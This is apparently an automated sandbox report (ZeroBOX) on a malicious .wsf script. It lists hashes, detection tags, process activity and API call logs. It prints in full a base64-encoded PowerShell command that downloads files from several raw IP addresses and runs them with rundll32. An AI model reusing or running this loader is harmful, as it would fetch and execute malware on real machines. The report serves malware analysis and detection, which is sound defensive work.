Summary | ZeroBOX

RP_April_Ahw(92).wsf

Generic Malware Antivirus AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6403_us April 7, 2023, 9:26 a.m. April 7, 2023, 9:28 a.m.
Size 180.3KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 94716ca9675a68da4e7fd4d9a878767f
SHA256 296216d92980ba3e44d0b5e14fac35c2861f3b58314a4029ace7ae08758c22cf
CRC32 EBFDFF47
ssdeep 3072:vPbQcqimHG2IA3UuHHObd+H/q4aY2u7y6GUK6kL5e94D8b6bUcWsZtW3XgT5w:vPb1mHqA3pHG+H/haY26h6bnTwCw
Yara
  • Generic_Malware_Zero - Generic Malware

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\RP_April_Ahw(92).wsf

    1256
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQARQByAHkAdABoAHIAYQBlAGkAZABhAGUATQBvAGQAaQBmAHkAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQAzADEALgAxADEANwAuADMAMAAvAHIAbwBTAE8AZAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAOQAuADEANAA3AC4AMQA3ADcALwBvAFgAagBrAEQAZwB1AEsAWgBQAHcAcwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgA1ADkALgAxADcAMAAuADQAOAAvAE0AUwBlADMAagBNAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgAzAC4ANgA5AC4AMQAxADYALwBKAFEAUgBCAE8AcwBpAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMgAwADYALgA1ADMALgA0ADgALgAyADEALwBaAHgAbQAwAE8ATQBDAHMANwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAMwAuADIAMAAwAC4AMQA3AC4AMgAwADcALwB6AHgASgBkAGwAbABSAEsAbABKAEcALgBkAGEAdAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIABpAG4AIAAkAEUAcgB5AHQAaAByAGEAZQBpAGQAYQBlAE0AbwBkAGkAZgB5ACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADkAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABVAG4AYQBsAGEAcgBtAGkAbgBnAGwAeQAuAEQAcgBvAG4AYQBnAGUALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="

      2156

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a1e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00589b28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00589b28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00589b28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00589b28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00589b28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00589b28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a328
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a8a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a6e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a6e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a6e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0058a6e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02710000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02860000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02452000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02861000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02862000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029bd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029be000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029bf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQARQByAHkAdABoAHIAYQBlAGkAZABhAGUATQBvAGQAaQBmAHkAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQAzADEALgAxADEANwAuADMAMAAvAHIAbwBTAE8AZAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAOQAuADEANAA3AC4AMQA3ADcALwBvAFgAagBrAEQAZwB1AEsAWgBQAHcAcwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgA1ADkALgAxADcAMAAuADQAOAAvAE0AUwBlADMAagBNAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgAzAC4ANgA5AC4AMQAxADYALwBKAFEAUgBCAE8AcwBpAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMgAwADYALgA1ADMALgA0ADgALgAyADEALwBaAHgAbQAwAE8ATQBDAHMANwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAMwAuADIAMAAwAC4AMQA3AC4AMgAwADcALwB6AHgASgBkAGwAbABSAEsAbABKAEcALgBkAGEAdAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIABpAG4AIAAkAEUAcgB5AHQAaAByAGEAZQBpAGQAYQBlAE0AbwBkAGkAZgB5ACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADkAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABVAG4AYQBsAGEAcgBtAGkAbgBnAGwAeQAuAEQAcgBvAG4AYQBnAGUALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="
cmdline powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQARQByAHkAdABoAHIAYQBlAGkAZABhAGUATQBvAGQAaQBmAHkAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQAzADEALgAxADEANwAuADMAMAAvAHIAbwBTAE8AZAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAOQAuADEANAA3AC4AMQA3ADcALwBvAFgAagBrAEQAZwB1AEsAWgBQAHcAcwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgA1ADkALgAxADcAMAAuADQAOAAvAE0AUwBlADMAagBNAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgAzAC4ANgA5AC4AMQAxADYALwBKAFEAUgBCAE8AcwBpAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMgAwADYALgA1ADMALgA0ADgALgAyADEALwBaAHgAbQAwAE8ATQBDAHMANwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAMwAuADIAMAAwAC4AMQA3AC4AMgAwADcALwB6AHgASgBkAGwAbABSAEsAbABKAEcALgBkAGEAdAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGEAcgBpAG8AbABpAGMAUABzAGUA